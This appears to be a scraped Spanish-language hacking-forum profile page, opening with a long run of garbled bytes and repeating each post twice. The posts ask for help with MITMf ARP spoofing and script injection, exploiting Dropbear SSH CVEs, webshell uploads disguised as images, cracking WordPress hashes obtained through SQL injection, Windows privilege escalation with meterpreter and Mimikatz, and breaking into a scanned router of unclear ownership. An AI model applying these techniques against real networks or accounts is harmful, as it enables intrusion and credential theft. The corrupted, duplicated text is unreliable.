FisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿ ÿ ÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿFisFisFisFisFisFisFisFisFisFisFisFisÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿ ÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿsi me pueden ayudar a capturar la imagen por favor por que es como si estuviera escondida y no la atrapa.
#4
Dudas y pedidos generales / Consulta sobre MITMF!
Febrero 18, 2018, 02:41:26 PM
buenas tarde amigos el dia de hoy les quiero preguntar si tienen problemas con mitmf ya que no esta trabajando por lo menos en mis 2 pc no lo hace y bettercap si trabaja lo eh instaalado de il formas y eh reinstalado la distro y no se xq no me funciona
aqui el comando que utilizo :
python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --arp --spoof --gateway 192.168.0.1 --target 192.168.0.19 --inject --js-url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -i wlan0
esta es la salida de la consola
aqui el comando que utilizo :
python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta --arp --spoof --gateway 192.168.0.1 --target 192.168.0.19 --inject --js-url No tienes permitido ver los links. Registrarse o Entrar a mi cuenta -i wlan0
esta es la salida de la consola
- MITMf v0.9.8 - 'The Dark Side'
|_ Inject v0.4
|_ Spoof v0.6
net.ipv4.ip_forward = 1
| |_ ARP spoofing enabled
|
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
* Running on No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (Press CTRL+C to quit)
|_ Net-Creds v1.0 online
Error starting HTTP server: [Errno 98] Address already in use
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online
^C
^C2018-02-18 12:36:11 [ARPpoisoner] Restoring connection 192.168.0.19 <-> 192.168.0.1 with 2 packets per host
net.ipv4.ip_forward = 0
pero no captura nada de nada se queda estatico no captura no injec no keylogger no nada no hace nada se quesda hay y no avanza si me puedeen ayudar por favor se los agradesco mucho... feliz tarde
#5
Dudas y pedidos generales / Como Explotar Dropbear SSH
Febrero 06, 2018, 09:15:09 PM
buenas tardes me podrian ayudar con este bug porfa no consigo como explotar..y no consigo informacion de como por lo menos crear algo para explotarlo..si me pueden ayudar gracias .
Dropbear SSH Server < 2016.72 Multiple Vulnerabilities
Description
According to its self-reported version in its banner, Dropbear SSH running on the remote host is prior to 2016.74. It is, therefore, affected by the following vulnerabilities :
- A format string flaw exists due to improper handling of string format specifiers (e.g., %s and %x) in usernames and host arguments. An unauthenticated, remote attacker can exploit this to execute arbitrary code with root privileges. (CVE-2016-7406)
- A flaw exists in dropbearconvert due to improper handling of specially crafted OpenSSH key files. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-7407)
- A flaw exists in dbclient when handling the -m or -c arguments in scripts. An unauthenticated, remote attacker can exploit this, via a specially crafted script, to execute arbitrary code. (CVE-2016-7408)
- A flaw exists in dbclient or dropbear server if they are compiled with the DEBUG_TRACE option and then run using the -v switch. A local attacker can exploit this to disclose process memory. (CVE-2016-7409)
Dropbear SSH Server < 2016.72 Multiple Vulnerabilities
Description
According to its self-reported version in its banner, Dropbear SSH running on the remote host is prior to 2016.74. It is, therefore, affected by the following vulnerabilities :
- A format string flaw exists due to improper handling of string format specifiers (e.g., %s and %x) in usernames and host arguments. An unauthenticated, remote attacker can exploit this to execute arbitrary code with root privileges. (CVE-2016-7406)
- A flaw exists in dropbearconvert due to improper handling of specially crafted OpenSSH key files. An unauthenticated, remote attacker can exploit this to execute arbitrary code. (CVE-2016-7407)
- A flaw exists in dbclient when handling the -m or -c arguments in scripts. An unauthenticated, remote attacker can exploit this, via a specially crafted script, to execute arbitrary code. (CVE-2016-7408)
- A flaw exists in dbclient or dropbear server if they are compiled with the DEBUG_TRACE option and then run using the -v switch. A local attacker can exploit this to disclose process memory. (CVE-2016-7409)
#6
Dudas y pedidos generales / [SOLUCIONADO] Que tipo de cifrado es el que explico aca ?
Enero 13, 2017, 03:55:40 PM
buenas tardes compañeros me podrian indicar..
que tipo de cifrado es este ya que no lo eh visto antes ??
The password it is encrypted
Passphrase: 6166366266626164646464636565363934663933303166306262373364633632
si me podrian ayudar porfa lo agradeceria.
que tipo de cifrado es este ya que no lo eh visto antes ??
The password it is encrypted
Passphrase: 6166366266626164646464636565363934663933303166306262373364633632
si me podrian ayudar porfa lo agradeceria.
#7
Dudas y pedidos generales / ¿Qué significa el carácter del campo password en SQLMAP?
Enero 12, 2017, 03:23:40 PM
buenas tardes compañeros estoy realizando una inyeccion con sqlmap pero la clave me aparece con ese icono o no se como llamarlo que significara ?=?
aca la imagen
aca la imagen
#8
Dudas y pedidos generales / [SOLUCIONADO] Problema con wargame
Enero 09, 2017, 03:46:33 PM
Buenas tardes compañeros tengo problemas al momento de realizar el upload de la shell ya les indico por que primero mostrare las imágenes.
img n- 1
Ahí vemos las extensiones permitidas cabe destacar que eh subido varias shell eh imagenes con backdoor al momento de subir la shell la coloco como .php.gif cuando le doy subir captuo las cabeceras y edito con http tamper data o live http ya lo he realizado pero nada aun subo el archivo carga satifactoriamente pero de hay no se que mas realizar ya que no me dice en que carpeta la subio o url eh utilizado los siguientes programas
date tamper
Editando con tamper las cabeceras.
live http
wirshark
jhead
weelevy
c99.txt
webshell
He subido al mismo imagenes pero no consigo nada donde la sube simepre carga en la misma page ...
He realizado spider con proxy zzap pero no consigo nada aun..este es el code source de la pagina.
Es raro el code ya que el form no tiene action y no se dirige a ninguna pagina y no se que mas hacer si me pueden explicar o si hay un truco que no eh realizado aun por favor..
El punto es que no se como o donde se guardan los upload...o si los tiene??
img n- 1
Ahí vemos las extensiones permitidas cabe destacar que eh subido varias shell eh imagenes con backdoor al momento de subir la shell la coloco como .php.gif cuando le doy subir captuo las cabeceras y edito con http tamper data o live http ya lo he realizado pero nada aun subo el archivo carga satifactoriamente pero de hay no se que mas realizar ya que no me dice en que carpeta la subio o url eh utilizado los siguientes programas
date tamper
Editando con tamper las cabeceras.
live http
wirshark
jhead
weelevy
c99.txt
webshell
He subido al mismo imagenes pero no consigo nada donde la sube simepre carga en la misma page ...
He realizado spider con proxy zzap pero no consigo nada aun..este es el code source de la pagina.
Es raro el code ya que el form no tiene action y no se dirige a ninguna pagina y no se que mas hacer si me pueden explicar o si hay un truco que no eh realizado aun por favor..
El punto es que no se como o donde se guardan los upload...o si los tiene??
#9
Dudas y pedidos generales / Se puede montar un cluster para crack de hash? en win
Agosto 28, 2016, 08:25:45 PM
buenas noches como puedo montar un cluster en so privativo win 8 para usar como crack de hash?
#10
Dudas y pedidos generales / ¿Cómo instalar tarjeta de video HD7770 radeo en Linux?
Agosto 06, 2016, 09:01:32 PM
Buenas tardes compañeros al momento tengo un problema con la tarjeta de video HD7770 radeo eh segido varios tutos y todos terminan mostandome la pantalla en blanco con l carita del monitor triste no h podido instalar la tarjeta de video alguien sabe como instalar bien bien los driverd == no me muestra el gnome pero por terminal si ando bien como puedo solucionar eso ==
#11
Dudas y pedidos generales / ¿Cómo obtener una clave MD5 en WordPress?
Agosto 05, 2016, 05:41:09 AM
Buenos dias,
He realizado una SQLi inject y pude obtener estos datos de la tabla usuario
1~admin~
$P$BgA9fZdjgMaPtvcr3F7toTLle3kCOi/,
5~blogger1~
$P$BKFShuWwjq2Mb7N3aQ9hlLg/6uh7e2.
como los puedo poner en texto plano es md5 wordpress tengo 2 horas en esto y no eh solucionado nada ya le pase el hashcat -a0 -m400 con rockyu y no consegui nada me pueden ayudar?
He realizado una SQLi inject y pude obtener estos datos de la tabla usuario
1~admin~
$P$BgA9fZdjgMaPtvcr3F7toTLle3kCOi/,
5~blogger1~
$P$BKFShuWwjq2Mb7N3aQ9hlLg/6uh7e2.
como los puedo poner en texto plano es md5 wordpress tengo 2 horas en esto y no eh solucionado nada ya le pase el hashcat -a0 -m400 con rockyu y no consegui nada me pueden ayudar?
#12
Dudas y pedidos generales / Duda en escalar privilegios? me pueden ayudar
Junio 01, 2016, 09:54:06 PM
Buenas tardes desde venezuela, compañeros tengo una duda y un reto por cumplir.. El reto consiste en obtener privilegios de administrador en un equipo con win 8.1 con tods sus actualizaciones antivirus fireweall up y con usuario sin privilegios sin estar en ningun grupo, si lo logro me gano una laptops hp 8440g y si no lo logro tengo que dar mi Xbox360 aparte de un reto es un aprendizaje se vale cualquier metodo a utilizar siempre y cuando no toque el equipo. Consultas en foros ayuda vale todo.
Mi pregunta es la siguiente, como puedo escalar privilegios si para abrir el archivo ofuscado hay unos que me piden clave de administrador, ya logre activar una seccion de meter preter pero solo usuario normal ya eh intentado con li siguiente::
Shellter
Para obtener el meterpreter
Prove con los siguientes exploit
Bypass
Ask
Veil-evasion
Ask con opcion EXE::Custon
Sysrat
Mimikatz para ver si podia ver la clave en la memoria
Incognito,
Bypass de manera local ( bypass.exe eleveta c/ shell y mada me dice que expiro el tiempo de ejecucion
Una compañera me indico que podia programar mi script para eso pero no se como, ni por donde iniciar=? ni nada (se puede hacer un script que abra con privilegios de administrador sin ingresar la clave?) eso no lo entiendo?
Que otro método puedo utilizar?? De antemano muchas gracias
Ah otra cosa ahorita estoy intentando con unicor-y pupy a ver que puedo hacer???
Enviado desde mi iPhone utilizando Tapatalk
Mi pregunta es la siguiente, como puedo escalar privilegios si para abrir el archivo ofuscado hay unos que me piden clave de administrador, ya logre activar una seccion de meter preter pero solo usuario normal ya eh intentado con li siguiente::
Shellter
Para obtener el meterpreter
Prove con los siguientes exploit
Bypass
Ask
Veil-evasion
Ask con opcion EXE::Custon
Sysrat
Mimikatz para ver si podia ver la clave en la memoria
Incognito,
Bypass de manera local ( bypass.exe eleveta c/ shell y mada me dice que expiro el tiempo de ejecucion
Una compañera me indico que podia programar mi script para eso pero no se como, ni por donde iniciar=? ni nada (se puede hacer un script que abra con privilegios de administrador sin ingresar la clave?) eso no lo entiendo?
Que otro método puedo utilizar?? De antemano muchas gracias
Ah otra cosa ahorita estoy intentando con unicor-y pupy a ver que puedo hacer???
Enviado desde mi iPhone utilizando Tapatalk
#13
Dudas y pedidos generales / [AYUDA ]Ingresar a dispositivo para poder avanzar a la red LAN.
Mayo 27, 2016, 07:48:05 PM
buenas tardes compañeros me pueden ayudar con este caso estoy aprendiendo cada dia mas xD bueno esto es lo que quiero
ingresar a un router cisco y esta es la info que tengo hasta ahora:
Nikto v2.1.6
+ Target IP: 2-x-x-x-x-x-
+ Target Hostname: xxx-xx-xxx-x
+ Target Port: 80
+ Start Time: 2016-05-26 08:56:08 (GMT-4.5)
+ Server: Virata-EmWeb/R6_0_1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://xxx-xxx-xx-x/redirect.html
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Virata-EmWeb/R6 0 appears to be outdated (current is at least R6_2_1)
+ Public HTTP Methods: HEAD, GET, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 6 error(s) and 7 item(s) reported on remote host
+ End Time: 2016-05-26 09:05:36 (GMT-4.5) (568 seconds)
y de nmap esto
PORT STATE SERVICE
22/tcp open ssh NetScreen sshd (protocol 2.0)
23/tcp open telnet Netscreen ScreenOS telnetd
80/tcp open http Virata-EmWeb 6.0.1
443/tcp open https microsoft-ds
Device type: specialized|VoIP phone|webcam|broadband router|printer|WAP
Running: CipherLab embedded, Cisco embedded, D-Link embedded, Efficient Networks embedded, Hioki embedded, Panasonic embedded, Symbol embedded
OS CPE: cpe:/h:cisco:unified_ip_phone_7941 cpe:/h:efficientnetworks:speedstream_4100 cpe:/h:panasonic:db-3510 cpe:/h:panasonic:db-3520 cpe:/h:panasonic:kx-hcm270 cpe:/h:spectrum24_4131
Too many fingerprints match this host to give specific OS details
Service Info: Device: firewall
mi pregunta es que posivilidades tengo de ingresar al router o como busco mas vulneravilidades o que pued hacer no solcito que me digan paso a paso solo un aporte para seguir investigando
ingresar a un router cisco y esta es la info que tengo hasta ahora:
Nikto v2.1.6
+ Target IP: 2-x-x-x-x-x-
+ Target Hostname: xxx-xx-xxx-x
+ Target Port: 80
+ Start Time: 2016-05-26 08:56:08 (GMT-4.5)
+ Server: Virata-EmWeb/R6_0_1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://xxx-xxx-xx-x/redirect.html
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Virata-EmWeb/R6 0 appears to be outdated (current is at least R6_2_1)
+ Public HTTP Methods: HEAD, GET, POST, PUT, DELETE, OPTIONS
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ ERROR: Error limit (20) reached for host, giving up. Last error:
+ Scan terminated: 6 error(s) and 7 item(s) reported on remote host
+ End Time: 2016-05-26 09:05:36 (GMT-4.5) (568 seconds)
y de nmap esto
PORT STATE SERVICE
22/tcp open ssh NetScreen sshd (protocol 2.0)
23/tcp open telnet Netscreen ScreenOS telnetd
80/tcp open http Virata-EmWeb 6.0.1
443/tcp open https microsoft-ds
Device type: specialized|VoIP phone|webcam|broadband router|printer|WAP
Running: CipherLab embedded, Cisco embedded, D-Link embedded, Efficient Networks embedded, Hioki embedded, Panasonic embedded, Symbol embedded
OS CPE: cpe:/h:cisco:unified_ip_phone_7941 cpe:/h:efficientnetworks:speedstream_4100 cpe:/h:panasonic:db-3510 cpe:/h:panasonic:db-3520 cpe:/h:panasonic:kx-hcm270 cpe:/h:spectrum24_4131
Too many fingerprints match this host to give specific OS details
Service Info: Device: firewall
mi pregunta es que posivilidades tengo de ingresar al router o como busco mas vulneravilidades o que pued hacer no solcito que me digan paso a paso solo un aporte para seguir investigando
#14
